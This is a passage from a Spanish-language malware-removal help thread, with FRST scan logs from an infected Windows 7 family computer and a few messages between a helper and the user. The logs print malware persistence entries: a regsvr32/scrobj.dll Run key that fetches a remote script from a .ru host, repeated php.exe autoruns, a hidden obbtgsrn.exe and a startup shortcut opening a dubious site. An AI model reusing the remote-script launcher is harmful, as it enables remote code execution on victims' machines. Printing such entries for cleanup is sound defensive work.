CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-08]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-08]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-08]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-12-08]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-08]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-08]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 2 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 7 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\System Profile [2018-11-24]
CHR HKLM\...\Chrome\Extension: [ibbfklbaljofpaanmpaeadejijfdddco]
CHR HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
==================== Servicios (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
S2 EpsonScanSvc; C:\Windows\system32\EscSvc.exe [122000 2011-12-12] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
S2 EPSON_PM_RPCV4_05; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_JT50RP.EXE [142432 2012-02-27] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
===================== Controladores (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2017-03-02] (LogMeIn, Inc. -> LogMeIn, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb.sys [22656 2007-05-14] (Microsoft Windows Hardware Compatibility Publisher -> Research In Motion Limited)
S3 RTL8167; C:\Windows\System32\DRIVERS\Rt86win7.sys [139776 2009-07-13] (Microsoft Windows -> Realtek Corporation )
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [128704 2016-08-16] (NGO -> MBB)
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
==================== NetSvcs (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
==================== Un mes (creado) ===================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-04-20 13:02 - 2020-04-20 13:03 - 000021132 _____ C:\Users\Familia Landaeta\Downloads\FRST.txt
2020-04-20 13:02 - 2020-04-20 13:02 - 000000965 _____ C:\Users\Public\Desktop\CCleaner.lnk
2020-04-20 13:02 - 2020-04-20 13:02 - 000000965 _____ C:\ProgramData\Desktop\CCleaner.lnk
2020-04-20 13:02 - 2020-04-20 13:02 - 000000300 ____H C:\Windows\Tasks\CCleaner Update.job
2020-04-20 13:02 - 2020-04-20 13:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2020-04-20 13:01 - 2020-04-20 13:03 - 000000000 ____D C:\FRST
2020-04-20 13:00 - 2020-04-20 13:03 - 000137562 _____ C:\Windows\ntbtlog.txt
2020-04-20 12:20 - 2020-04-20 12:28 - 002009600 _____ (Farbar) C:\Users\Familia Landaeta\Downloads\FRST.exe
2020-04-20 08:59 - 2020-04-20 09:03 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565 (1).exe
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Highresolution Enterprises
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\Program Files\Highresolution Enterprises
2020-04-19 18:28 - 2020-04-19 18:31 - 002713952 _____ C:\Users\Familia Landaeta\Downloads\x-mouse-button-control-2-19.exe
2020-04-17 11:34 - 2020-04-17 16:45 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565.exe
2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ C:\Users\Familia Landaeta\AppData\Local\php.zip
2020-04-16 11:01 - 2020-04-16 15:58 - 000002238 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-04-16 11:01 - 2020-04-16 15:58 - 000002238 _____ C:\ProgramData\Desktop\League of Legends.lnk
2020-04-16 10:38 - 2020-04-16 11:08 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Riot Games
2020-04-16 10:38 - 2020-04-16 11:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:38 - 2020-04-16 10:38 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:32 - 2020-04-16 19:09 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Riot Games
2020-04-16 10:03 - 2020-04-16 10:17 - 068993192 _____ (Riot Games, Inc.) C:\Users\Familia Landaeta\Downloads\Install League of Legends la1.exe
==================== Un mes (modificado) ==================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-04-20 13:02 - 2018-11-19 11:24 - 000096768 ___SH C:\Users\Familia Landaeta\Documents\Thumbs.db
2020-04-20 13:02 - 2016-09-12 11:40 - 000000000 ____D C:\Program Files\CCleaner
2020-04-20 13:01 - 2019-02-05 08:42 - 000121344 ___SH C:\Users\Familia Landaeta\Desktop\Thumbs.db
2020-04-20 13:01 - 2018-11-21 13:14 - 000164352 ___SH C:\Users\Familia Landaeta\Downloads\Thumbs.db
2020-04-20 13:00 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-04-20 13:00 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-04-20 12:51 - 2019-02-05 08:51 - 000000000 ___HD C:\Users\Familia Landaeta\AppData\Local\aoxfre
2020-04-20 12:19 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\tracing
2020-04-20 08:57 - 2009-07-14 00:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-19 18:32 - 2016-10-17 10:44 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Games
2020-04-19 14:11 - 2016-09-12 11:42 - 000004050 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{6BA31EE6-0E9C-4B23-991B-FCF4330E17DB}
2020-04-19 11:25 - 2018-02-08 17:11 - 000004464 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-04-18 08:12 - 2018-12-04 09:02 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Pendrive
2020-04-16 16:51 - 2016-09-12 11:46 - 000002168 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-16 11:07 - 2016-09-21 12:10 - 000000000 ____D C:\ProgramData\Riot Games
2020-04-16 10:37 - 2018-03-13 00:16 - 000000000 ____D C:\Users\Familia Landaeta\Documents\Discord
2020-04-16 10:20 - 2016-09-12 11:35 - 000003524 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-04-16 10:20 - 2016-09-12 11:35 - 000003396 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-04-16 10:19 - 2016-09-12 11:35 - 000000000 ____D C:\Program Files\Google
2020-04-16 09:57 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\inf
2020-04-16 09:42 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\system32\NDF
2020-04-16 09:23 - 2019-04-13 03:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\ElevatedDiagnostics
2020-04-08 17:01 - 2017-01-22 15:53 - 000000000 ____D C:\Program Files\Counter-Strike 1.6
==================== Archivos en la raíz de algunos directorios ========
2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\php.zip
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
==================== SigCheck ============================
(No existe una corrección automática para los archivos que no pasan la verificación.)
LastRegBack: 2020-04-19 13:05
==================== Final de FRST.txt ========================Hola
Falta otro log, el Frst.txt…
Ademas se indicaba muy remarcado que habia que ejecutarlo desde El Escritorio, y no desde una carpeta.
Pega el otro log y corta y pega FRST,exe en el Escritorio
Ademas, segun veo, Ccleaner esta instalado o al menos aparece en programas…vete a Disco C- archivos de programa- Ccleaner y ejecuta directamente el Ccleaner.exe y dime si se abre
seguro viste el ccleaner porque lo instale en modo seguro, sin embargo, no corriò.
acà estan los logs
texto preformateado con sangría de 4 espacios
Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (administrador) sobre FAMILIALANDAETA (Hewlett-Packard HP 500B Microtower) (22-04-2020 11:47:21)
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Platform: Microsoft Windows 7 Ultimate Service Pack 1 (X86) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: Chrome)
Modo de Inicio: Safe Mode (minimal)
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Procesos (Lista blanca) =================
(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registro (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle America, Inc. -> Oracle Corporation)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1346848 2020-02-09] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Familia Landaeta\AppData\Local\Akamai\netsession_win.exe [4586456 2018-04-17] (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [wmwrdqj] => C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe [141824 2013-10-11] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php0] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php1] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php2] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php3] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php4] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php5] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php6] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php7] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php8] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php9] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3371296 2020-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Mystify.scr [221184 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\81.0.4044.113\Installer\chrmstp.exe [2020-04-20] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems, Inc.)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recorte de pantalla e Inicio rápido de OneNote 2007.lnk [2016-10-06]
ShortcutTarget: Recorte de pantalla e Inicio rápido de OneNote 2007.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk [2020-04-17]
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk *
==================== Tareas programadas (Lista blanca) ============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
Task: {1F3AC100-06D5-4A79-ACEB-822B7917AF2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {268EE322-C696-4C2A-ADED-73EEE65E5919} - System32\Tasks\{33D029CD-E2EB-4BBF-840D-05EE30782182} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\eauninstall.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {4D752A87-53D3-4FDE-856C-14DA2FE85B25} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {4F752C9C-8039-4148-94E7-17E0424FB331} - System32\Tasks\{B578D2A0-8F24-4C93-B6F3-0E29139E5C47} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Warcraft III\SetupReg.exe" -d "C:\Users\Familia Landaeta\Documents\Warcraft III"
Task: {65B18C1F-B953-43BD-B364-B3652C2ACD60} - System32\Tasks\{D3E37D6B-A5F9-4EBD-83FD-1DE5065FB775} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\setup.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {672FBA20-83CF-4151-8163-DE75916F4816} - System32\Tasks\{0C16381D-B4C5-4BFB-B0DE-23B539A738D3} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {A6C8DED6-B773-4517-BF76-B6538CD4434C} - System32\Tasks\{FE65F450-8DDE-41FF-8B71-F2B53B14CB22} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7\dxsetup.exe" -d "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7"
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
Task: {AD5C2F40-438A-4391-8C94-3D407E01EF45} - System32\Tasks\{8E6B5861-4FEB-40B7-AA9A-A940302A2D7E} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {CCB34560-3404-4CE5-9DAB-6B46BCB23E2D} - System32\Tasks\{B9641373-3BD3-45E5-A647-78413E924EF2} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER\mplaynow.exe" -d "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER"
Task: {D6A3E4BB-CBD0-4187-9DCC-3D6F403A10BE} - System32\Tasks\{57FB3682-2104-4F36-8579-4DC3DC47852F} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139\install.exe" -d "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139"
Task: {DAD5D05F-49AA-4561-BCB6-CF36DEC9F03F} - System32\Tasks\{BDC282FB-7E2B-40AD-B6A1-10CE822F66CB} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6\unins000.exe" -d "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6"
Task: {DC289D95-95B2-4999-9194-C785C844D430} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {E292CC29-6E23-428B-A8A9-8B353DCB0242} - System32\Tasks\{27B6EE2D-9F7D-4816-8664-F8C35923C977} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EB26897C-3B5C-4277-B0BC-C6842F8F6430} - System32\Tasks\{B695C6D3-B08B-4889-8983-0E883F2B1BD2} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EF2ECF57-BD80-471F-B663-4A9C03A36584} - System32\Tasks\{8C3C6385-93E2-4818-A124-0E0FECD10D73} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {FB402BC5-78F6-4A55-937B-E6AEEE83C91C} - System32\Tasks\{71A43D0C-6750-4381-ACFE-5879AE010440} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)
Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
==================== Internet (Lista blanca) ====================
(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)
Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{6657F0B0-4452-44DD-8333-C6955B9AC142}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{7C7F7E39-7E43-45F1-9777-5354FEA74937}: [DhcpNameServer] 192.168.42.129
Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> {2F3822DF-85FD-483C-B3AA-38ECD8118D39} URL = hxxps://ve.search.yahoo.com/search?p={searchTerms}&intl=ve&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle
BHO: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Ningún archivo
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: dqwbx6g2.default
FF ProfilePath: C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default [2020-04-20]
FF Homepage: Mozilla\Firefox\Profiles\dqwbx6g2.default -> hxxp://www.google.com/
FF Extension: (Search and New Tab by Yahoo) - C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default\Extensions\[email protected] [2017-04-10] [Heredado]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on
FF Extension: (E-Web Print) - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on [2016-10-09] [Heredado] [no firmado]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default [2020-04-22]
CHR NewTab: Default -> Not-active:"chrome-extension://dobeegjfclcaalnakkicjhgcbmjcghbp/newtab/newtab.html"
CHR Extension: (Presentaciones) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-02-08]
CHR Extension: (Documentos) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-02-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-12]
CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-12]
CHR Extension: (TV Hero) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\dobeegjfclcaalnakkicjhgcbmjcghbp [2020-04-16]
CHR Extension: (Adobe Acrobat) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-04-16]
CHR Extension: (Hojas de cálculo) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-02-08]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-20]
CHR Extension: (AdBlock: el mejor bloqueador de anuncios) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-04-21]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-16]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-07]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-21]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-11-24]
CHR Extension: (Presentaciones de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-08]
CHR Extension: (Google Docs) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-08]
CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-08]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-08]
